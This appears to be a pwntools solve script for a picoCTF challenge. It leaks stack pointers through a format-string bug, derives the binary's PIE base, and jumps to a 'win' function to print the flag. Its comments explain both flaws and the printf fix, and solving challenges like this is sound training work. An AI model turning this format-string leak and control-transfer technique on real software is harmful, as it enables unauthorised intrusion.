#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
# The challenge binary under analysis; assigning it to ``context.binary``
# lets pwntools derive arch/bits/OS settings from the ELF itself.
exe = ELF("./vuln")
context.binary = exe

# Remote endpoint kept as a single "host port" string and split into its parts.
# PORT stays a string, exactly as the original two-way unpack produced it.
_TARGET = "rescued-float.picoctf.net 54718"
ADDR, PORT = _TARGET.split(maxsplit=1)
def conn() -> remote:
    """Open a tube to the challenge.

    With ``REMOTE`` given on the command line (pwntools' ``args``), connect
    to the hosted instance at ``ADDR``:``PORT``; otherwise spawn ``./vuln``
    locally so the same script can be used against the local binary.
    """
    target = remote(ADDR, PORT) if args.REMOTE else process([exe.path])
    return target
def main():
    """Solve the challenge end to end.

    1. Leak stack words through the format-string bug in the name prompt.
    2. Recover the binary's load base from one leaked code pointer.
    3. Hand the rebased address of ``win`` to the program's "jump to" prompt.

    The exchange is a strictly ordered recv/send dialogue with the target,
    so the statements below must stay in this sequence.
    """
    r = conn()

    # Debugging aid kept for local runs: attach gdb and dump the mappings to
    # re-derive ``leak_offset`` if the binary is rebuilt.
    # gdb.attach(r, gdbscript='''
    # info proc mappings
    # c
    # ''')

    # Calculated by inspecting the output - the reported binary start address from gdb.
    # Distance from the binary's load base to the code pointer that shows up as
    # the 19th leaked word (``leaks[18]``); specific to this build of ./vuln.
    leak_offset = 0x1441

    # The name prompt evidently passes user input to a printf-style function,
    # so a run of "%p" conversions prints raw stack words. That disclosure is
    # what defeats PIE here; on the program side the mitigation is to never
    # use user data as the format argument (e.g. printf("%s", name)).
    r.recvuntil(b'Enter your name:').decode()
    r.sendline(b'%p\t'*20)
    # The echoed line holds the 20 leaked values, tab-separated.
    leaks = r.recvline().strip().decode().split('\t')
    base_leak = leaks[18]
    # Drop the leading "0x" before parsing. NOTE(review): nothing guards against
    # a "(nil)" entry or a shorter leak list, so a different stack layout fails here.
    exe.address = int(base_leak[2:], 16) - leak_offset
    # pwntools rebases symbols relative to exe.address, so exe.symbols['win']
    # is now an absolute runtime address.
    print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}")

    # The program asks for a raw address and transfers control to it; that is
    # the second flaw (no validation of the destination), which the leak above
    # turns into a reliable jump despite ASLR.
    print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode())
    r.sendline(hex(exe.symbols['win']))
    # Drain everything the target prints after the jump (the flag output).
    print(r.recvall().decode())
    r.close()
if __name__ == "__main__":
    # Run the solve only when the script is executed directly, not on import.
    main()